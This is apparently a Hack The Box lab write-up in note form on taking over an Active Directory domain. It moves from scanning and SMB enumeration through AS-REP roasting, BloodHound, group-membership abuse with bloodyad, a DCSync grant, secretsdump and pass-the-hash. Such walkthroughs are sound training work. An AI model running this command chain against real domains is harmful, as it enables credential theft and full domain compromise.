# Lessons Learned - xxx --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260710194303.png]] - `nmap` scan - light ![[images/Pasted image 20260710194426.png]] - create comma separated `ports.txt` ```bash cat nmap/light | grep -v "(\|nmap" | grep / | cut -d'/' -f 1 | sed -z 's/\n/,/g; s/,$/\n/' | tee ports.txt ``` ![[images/Pasted image 20260710194440.png]] - `nmap` scan - detailed ![[images/Pasted image 20260710194815.png]] - NOTE: material clock skew --- # Service Enum ## Port 445 (SMB) ### Null Auth - some success ![[images/Pasted image 20260710195151.png]] ### Shares - no access yet ![[images/Pasted image 20260710195216.png]] ### Users - we have the makings of `users.txt` ![[images/Pasted image 20260710195251.png]] - create `users.txt` and edit ![[images/Pasted image 20260710195412.png]] ![[images/Pasted image 20260710195449.png]] ### Password Policy - no worries here ![[images/Pasted image 20260710195523.png]] --- # AD Enum ## ASREP Roasting ```bash nxc ldap 10.129.26.140 -d htb.local -u users.txt -p '' --asreproast asrep.ou ``` - `svc_alfresco` has no pre-auth set ![[images/Pasted image 20260710195635.png]] - crack with `hashcat -m 18200` ```bash hashcat -m 18200 asrep.out /opt/rockyou.txt ``` - confirm creds ![[images/Pasted image 20260710200426.png]] ## Shares - `svc_alfresco` only has access to default shares ![[images/Pasted image 20260710200505.png]] ## Kerberoasting ```bash nxc ldap 10.129.26.140 -d htb.local -u svc-alfresco -p password --kerberoasting kerb.out ``` - nothing ![[images/Pasted image 20260710200651.png]] ## ADCS ```bash nxc ldap 10.129.26.140 -d htb.local -u svc-alfresco -p password -M adcs ``` - nothing ![[images/Pasted image 20260710200727.png]] ## BloodHound - Run remote ingestor ```bash /opt/rusthound-ce -d htb.local -u [email protected] -p password -c All -z -i 10.129.26.140 ``` ![[images/Pasted image 20260710201604.png]] - Spin up container for bloodhound GUI ```bash cd /opt/bloodhound docker compose up -d ``` ![[images/Pasted image 20260710201719.png]] - `svc-alfresco` has serious group memberships ![[images/Pasted image 20260710202214.png]] - other user cannot do much - honestly this is too much info - rerun ingestion with `bloodhound-python` ```bash sudo bloodhound-python -u 'svc-alfresco' -p 'password' -dc forest.htb.local -ns 10.129.26.140 -d htb.local -c all ``` - we have a different path to `administrator` through `Exchange Windows Permissions`, whihc has `WriteDacl` over the domain ![[images/Pasted image 20260710212717.png]] - confirm winrm access ![[images/Pasted image 20260710202544.png]] - PWNED --- # Shell as `svc-alfresco` - `whoami /all` ![[images/Pasted image 20260710203059.png]] - `svc-alfresco` is in `BUILTIN\Account Operators` who can modify unprotected accounts - can also add machine accounts to the domain with `SeMachineAccountPrivilege` - home dir ![[images/Pasted image 20260710203031.png]] - programs ![[images/Pasted image 20260710210359.png]] --- # Privsec ## Add `svc-alfresco` to `0rganization Managment` - add self to `0rganization Managment` ```bash bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Organization Management' svc-alfresco ``` ![[images/Pasted image 20260710204124.png]] - targetedKerberoast ```bash python3 targetedKerberoast.py -d htb.local -u svc-alfresco -p password --dc-ip 10.129.26.140 ``` - we have TGS for all users but `administrator` ![[images/Pasted image 20260710204536.png]] - since we saw that `sebastien` has a home dir on the box let's try to crack his TGS - exhausted ![[images/Pasted image 20260710212240.png]] - force change password for `administrator` ```bash bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password set password administrator password123 ``` - running into errors here ![[images/Pasted image 20260710204913.png]] - either `administrator` password cannot be reset or something else if afoot ## Add `svc-alfresco` to `Exchange Windows Permissions` - let's change course and add `svc-alfresco` to `Exchange Windows Permissions` - this group has `WriteDacl` over `htb.local`, which means we should be able to DCsync next ```bash bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Exchange Windows Permissions' svc-alfresco ``` ![[images/Pasted image 20260710210048.png]] - DCsync failed out ![[images/Pasted image 20260710210537.png]] ### Noticing that time is of the essence - confirm membership - looks like membership is being cleaned out on a periodic basis > we will have to be faster ```bash bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password get membership svc-alfresco ``` - load up commands for quick draw mode ```bash bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add groupMember 'Exchange Windows Permissions' svc-alfresco bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password get membership svc-alfresco bloodyad --host 10.129.26.140 -d htb.local -u svc-alfresco -p password add dcsync svc-alfresco secretsdump.py htb.local/svc-alfresco:[email protected] ``` - that worked ![[images/Pasted image 20260710211909.png]] - PtH to grab `root.txt` ![[images/Pasted image 20260710211930.png]]